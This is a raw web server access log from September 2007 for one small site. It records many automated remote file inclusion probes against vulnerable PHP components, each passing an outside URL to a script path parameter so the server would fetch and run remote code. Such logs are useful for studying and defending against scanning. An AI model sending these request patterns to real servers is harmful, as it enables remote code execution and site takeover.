84.18.200.201 - - [13/Sep/2007:19:22:45 -0700] "GET /logs/upload//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 288 "-" "libwww-perl/5.808" "www.projectpr.com"
84.18.200.201 - - [13/Sep/2007:19:22:45 -0700] "GET /upload//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.197.129.53 - - [13/Sep/2007:19:23:01 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://rms2.ifrance.com/safe.txt?? HTTP/1.1" 404 295 "-" "libwww-perl/5.808" "www.projectpr.com"
66.197.129.53 - - [13/Sep/2007:19:28:58 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://rms2.ifrance.com/safe.txt?? HTTP/1.1" 404 311 "-" "libwww-perl/5.808" "www.projectpr.com"
66.197.129.53 - - [13/Sep/2007:19:28:58 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://rms2.ifrance.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
195.200.91.130 - - [13/Sep/2007:19:30:33 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 321 "-" "libwww-perl/5.805" "www.projectpr.com"
195.200.91.130 - - [13/Sep/2007:19:30:33 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
195.200.91.130 - - [13/Sep/2007:19:30:34 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
84.18.200.201 - - [13/Sep/2007:19:32:56 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.99.194.216 - - [13/Sep/2007:20:00:25 -0700] "GET /logs/access.log/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://claudiablackonline.com/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.99.194.216 - - [13/Sep/2007:20:00:25 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://claudiablackonline.com/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.99.194.216 - - [13/Sep/2007:20:00:25 -0700] "GET /logs/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://claudiablackonline.com/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
193.95.196.84 - - [13/Sep/2007:20:11:14 -0700] "GET /logs/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://www.feniks-sd.hr/cache/echo.txt? HTTP/1.1" 404 289 "-" "libwww-perl/5.76" "www.projectpr.com"
193.95.196.84 - - [13/Sep/2007:20:11:14 -0700] "GET /components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://www.feniks-sd.hr/cache/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
216.55.161.50 - - [13/Sep/2007:20:29:20 -0700] "GET /logs/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://www.djvictoralegre.com/cache/.../.../echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
216.55.161.50 - - [13/Sep/2007:20:29:20 -0700] "GET /components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://www.djvictoralegre.com/cache/.../.../echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
193.95.196.84 - - [13/Sep/2007:20:36:30 -0700] "GET /logs/access.log/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://www.feniks-sd.hr/cache/echo.txt? HTTP/1.1" 404 300 "-" "libwww-perl/5.76" "www.projectpr.com"
205.234.129.182 - - [13/Sep/2007:20:45:46 -0700] "GET /logs/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://www.1067thepenguin.com/cache/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.129.182 - - [13/Sep/2007:20:45:46 -0700] "GET /components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://www.1067thepenguin.com/cache/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
216.55.161.50 - - [13/Sep/2007:21:04:29 -0700] "GET /logs/access.log/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://www.djvictoralegre.com/cache/.../.../echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
80.84.247.233 - - [13/Sep/2007:21:21:01 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 289 "-" "libwww-perl/5.805" "www.projectpr.com"
194.31.241.132 - - [13/Sep/2007:21:24:41 -0700] "GET /classes/adodbt/sql.php?classes_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.65" "www.projectpr.com"
140.123.101.145 - - [13/Sep/2007:21:32:51 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Gaisbot/3.0+(robot06@gais.cs.ccu.edu.tw;+http://gais.cs.ccu.edu.tw/robot.php)" "www.projectpr.com"
81.169.154.94 - - [13/Sep/2007:21:39:27 -0700] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ODP entries t_st; http://tuezilla.de/t_st-odp-entries-agent.html)" "www.projectpr.com"
193.226.105.79 - - [13/Sep/2007:21:47:40 -0700] "GET /logs/index.php?mod=jeuxflash&ac=play&id=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
194.31.241.132 - - [13/Sep/2007:21:49:39 -0700] "GET /logs/access.log/classes/adodbt/sql.php?classes_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.65" "www.projectpr.com"
194.31.241.132 - - [13/Sep/2007:21:49:39 -0700] "GET /logs/classes/adodbt/sql.php?classes_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
208.36.144.9 - - [13/Sep/2007:22:42:24 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "www.projectpr.com"
74.6.19.121 - - [13/Sep/2007:22:50:11 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
74.6.28.107 - - [13/Sep/2007:22:50:30 -0700] "GET /navigation_bars/ HTTP/1.0" 200 807 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
201.235.253.56 - - [13/Sep/2007:22:58:37 -0700] "GET /logs/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://wespenval.nl/bestel/images/canboy1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
201.235.253.56 - - [13/Sep/2007:22:58:37 -0700] "GET /logs/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://wespenval.nl/bestel/images/canboy1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
201.235.253.56 - - [13/Sep/2007:22:58:38 -0700] "GET /components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://wespenval.nl/bestel/images/canboy1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.216.213.227 - - [13/Sep/2007:23:03:42 -0700] "GET /logs/access.log//Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://www.sxmlink.org/new/administrator/components/com_installer/language/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
209.216.213.227 - - [13/Sep/2007:23:03:42 -0700] "GET //Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://www.sxmlink.org/new/administrator/components/com_installer/language/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
209.216.213.227 - - [13/Sep/2007:23:03:42 -0700] "GET /logs//Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://www.sxmlink.org/new/administrator/components/com_installer/language/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
208.97.118.21 - - [13/Sep/2007:23:16:59 -0700] "GET /images/desk_aerial_view.jpg HTTP/1.1" 200 206037 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)" "www.projectpr.com"
74.6.25.214 - - [14/Sep/2007:00:00:13 -0700] "GET /aboutus.html HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
201.235.253.56 - - [14/Sep/2007:00:06:56 -0700] "GET /logs/access.log/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://wespenval.nl/bestel/images/canboy1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
201.235.253.56 - - [14/Sep/2007:00:06:56 -0700] "GET /logs/access.log/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://wespenval.nl/bestel/images/canboy1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
62.193.192.100 - - [14/Sep/2007:00:37:35 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.79" "www.projectpr.com"
62.193.192.100 - - [14/Sep/2007:00:37:35 -0700] "GET /newspublish/include.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
74.6.26.48 - - [14/Sep/2007:00:41:59 -0700] "GET /clipart/?M=A HTTP/1.0" 200 1197 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
67.18.16.82 - - [14/Sep/2007:01:01:51 -0700] "GET /logs/access.log//includes/login.php?_SESSION[docroot_path]=http://allergy.dlearn.kmu.edu.tw/uploads/xpL/a?? HTTP/1.1" 404 281 "-" "libwww-perl/5.808" "www.projectpr.com"
67.18.16.82 - - [14/Sep/2007:01:01:51 -0700] "GET //includes/login.php?_SESSION[docroot_path]=http://allergy.dlearn.kmu.edu.tw/uploads/xpL/a?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
67.18.16.82 - - [14/Sep/2007:01:01:51 -0700] "GET /logs//includes/login.php?_SESSION[docroot_path]=http://allergy.dlearn.kmu.edu.tw/uploads/xpL/a?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [14/Sep/2007:01:50:53 -0700] "GET /logs/access.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [14/Sep/2007:01:50:53 -0700] "GET /logs/access.log/sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [14/Sep/2007:01:50:54 -0700] "GET /sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [14/Sep/2007:01:50:54 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [14/Sep/2007:01:50:54 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [14/Sep/2007:01:50:54 -0700] "GET /logs/sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.6.19.121 - - [14/Sep/2007:02:22:16 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
74.6.24.154 - - [14/Sep/2007:02:22:17 -0700] "GET /logs/?M=A HTTP/1.0" 200 3925 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
205.234.135.19 - - [14/Sep/2007:02:32:58 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_contehttp://www.isslimited.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.6.20.204 - - [14/Sep/2007:02:36:21 -0700] "GET /clipart/?N=D HTTP/1.0" 200 1197 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
205.234.135.19 - - [14/Sep/2007:02:39:50 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_contehttp://www.isslimited.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.135.19 - - [14/Sep/2007:02:39:50 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_contehttp://www.isslimited.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
203.32.125.78 - - [14/Sep/2007:02:40:33 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_contewww.infostec.hpg.com.br/spread.jpg? HTTP/1.1" 404 268 "-" "libwww-perl/5.805" "www.projectpr.com"
207.58.131.228 - - [14/Sep/2007:03:12:15 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.okgopchat.com/forum/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.58.131.228 - - [14/Sep/2007:03:12:15 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.okgopchat.com/forum/id.txt? HTTP/1.1" 404 305 "-" "libwww-perl/5.808" "www.projectpr.com"
207.58.131.228 - - [14/Sep/2007:03:12:15 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.okgopchat.com/forum/id.txt? HTTP/1.1" 404 310 "-" "libwww-perl/5.808" "www.projectpr.com"
140.123.101.145 - - [14/Sep/2007:03:32:41 -0700] "GET /services.html HTTP/1.0" 200 9306 "-" "Gaisbot/3.0+(robot06@gais.cs.ccu.edu.tw;+http://gais.cs.ccu.edu.tw/robot.php)" "www.projectpr.com"
140.123.101.145 - - [14/Sep/2007:03:32:55 -0700] "GET /aboutus.html HTTP/1.0" 200 9447 "-" "Gaisbot/3.0+(robot06@gais.cs.ccu.edu.tw;+http://gais.cs.ccu.edu.tw/robot.php)" "www.projectpr.com"
140.123.101.145 - - [14/Sep/2007:03:33:49 -0700] "GET /contactus.html HTTP/1.0" 200 12521 "-" "Gaisbot/3.0+(robot06@gais.cs.ccu.edu.tw;+http://gais.cs.ccu.edu.tw/robot.php)" "www.projectpr.com"
69.56.226.34 - - [14/Sep/2007:03:42:48 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.808" "www.projectpr.com"
69.56.226.34 - - [14/Sep/2007:03:42:48 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
70.87.118.244 - - [14/Sep/2007:03:45:20 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://polosudnord.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
70.87.118.244 - - [14/Sep/2007:03:45:20 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://polosudnord.altervista.org/id.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.805" "www.projectpr.com"
70.87.118.244 - - [14/Sep/2007:03:45:20 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://polosudnord.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
70.87.118.244 - - [14/Sep/2007:03:45:24 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://polosudnord.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
70.87.118.244 - - [14/Sep/2007:03:45:24 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://polosudnord.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
70.87.118.244 - - [14/Sep/2007:03:45:24 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://polosudnord.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
69.56.226.34 - - [14/Sep/2007:03:52:09 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.56.226.34 - - [14/Sep/2007:03:52:09 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.56.226.34 - - [14/Sep/2007:03:52:11 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.56.226.34 - - [14/Sep/2007:03:52:12 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
81.21.73.27 - - [14/Sep/2007:04:18:40 -0700] "GET /logs/http://www.the-esao.com/imag/stringa.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.803" "www.projectpr.com"
81.21.73.27 - - [14/Sep/2007:04:18:41 -0700] "GET /http://www.the-esao.com/imag/stringa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.21.73.27 - - [14/Sep/2007:04:19:32 -0700] "GET /logs/http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.21.73.27 - - [14/Sep/2007:04:19:33 -0700] "GET /http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.21.73.27 - - [14/Sep/2007:04:19:48 -0700] "GET /logs/http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.21.73.27 - - [14/Sep/2007:04:19:48 -0700] "GET /http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
193.193.194.194 - - [14/Sep/2007:04:22:00 -0700] "GET /logs/http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 291 "-" "libwww-perl/5.805" "www.projectpr.com"
193.193.194.194 - - [14/Sep/2007:04:22:00 -0700] "GET /http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.191.6.72 - - [14/Sep/2007:04:33:39 -0700] "GET /logs/access.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://armedcoreunit.eu/vwar/convert/id.txt? HTTP/1.1" 404 331 "-" "libwww-perl/5.808" "www.projectpr.com"
64.191.6.72 - - [14/Sep/2007:04:33:40 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://armedcoreunit.eu/vwar/convert/id.txt? HTTP/1.1" 404 315 "-" "libwww-perl/5.808" "www.projectpr.com"
64.191.6.72 - - [14/Sep/2007:04:33:40 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://armedcoreunit.eu/vwar/convert/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.191.6.72 - - [14/Sep/2007:04:33:41 -0700] "GET /logs/access.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://armedcoreunit.eu/vwar/convert/id.txt? HTTP/1.1" 404 331 "-" "libwww-perl/5.808" "www.projectpr.com"
64.191.6.72 - - [14/Sep/2007:04:33:42 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://armedcoreunit.eu/vwar/convert/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.191.6.72 - - [14/Sep/2007:04:33:42 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://armedcoreunit.eu/vwar/convert/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
24.222.117.90 - - [14/Sep/2007:04:34:42 -0700] "GET /logs/access.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://armedcoreunit.eu/vwar/convert/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
24.222.117.90 - - [14/Sep/2007:04:34:42 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://armedcoreunit.eu/vwar/convert/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
24.222.117.90 - - [14/Sep/2007:04:34:42 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://armedcoreunit.eu/vwar/convert/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
210.95.249.109 - - [14/Sep/2007:04:34:43 -0700] "GET /logs/access.log//login.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
210.95.249.109 - - [14/Sep/2007:04:34:44 -0700] "GET //login.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.65" "www.projectpr.com"
210.95.249.109 - - [14/Sep/2007:04:34:44 -0700] "GET /logs//login.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
85.25.223.221 - - [14/Sep/2007:04:37:26 -0700] "GET /logs/access.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://armedcoreunit.eu/vwar/convert/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.25.223.221 - - [14/Sep/2007:04:37:27 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://armedcoreunit.eu/vwar/convert/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.25.223.221 - - [14/Sep/2007:04:37:27 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://armedcoreunit.eu/vwar/convert/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
87.255.1.130 - - [14/Sep/2007:04:39:40 -0700] "GET /logs/access.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://n0ne.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
87.255.1.130 - - [14/Sep/2007:04:39:41 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://n0ne.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
87.255.1.130 - - [14/Sep/2007:04:39:41 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://n0ne.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
213.22.58.245 - - [14/Sep/2007:05:14:45 -0700] "GET /logs/access.log//login.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 272 "-" "libwww-perl/5.805" "www.projectpr.com"
213.22.58.245 - - [14/Sep/2007:05:14:45 -0700] "GET //login.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.22.58.245 - - [14/Sep/2007:05:14:45 -0700] "GET /logs//login.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.805" "www.projectpr.com"
66.197.194.69 - - [14/Sep/2007:05:54:14 -0700] "GET //cms/newspublish/home.parserss.php//include.php?path[docroot]=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
81.21.73.27 - - [14/Sep/2007:05:55:02 -0700] "GET /logs/http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.803" "www.projectpr.com"
81.21.73.27 - - [14/Sep/2007:05:55:03 -0700] "GET /http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 292 "-" "libwww-perl/5.803" "www.projectpr.com"
